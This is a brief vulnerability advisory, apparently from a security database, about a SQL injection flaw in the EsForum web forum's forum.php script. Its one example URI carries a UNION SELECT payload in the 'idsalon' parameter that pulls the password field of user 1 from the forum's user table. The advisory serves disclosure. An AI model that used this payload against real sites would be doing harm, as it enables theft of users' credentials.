EsForum Forum.PHP SQL Injection Vulnerability

EsForum Forum.PHP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/forum.php?idsalon='/**/UNION/**/SELECT/**/0,1,2,3,4,user_password,6/**/FROM/**/esforum_users%20where%20user_id=1/*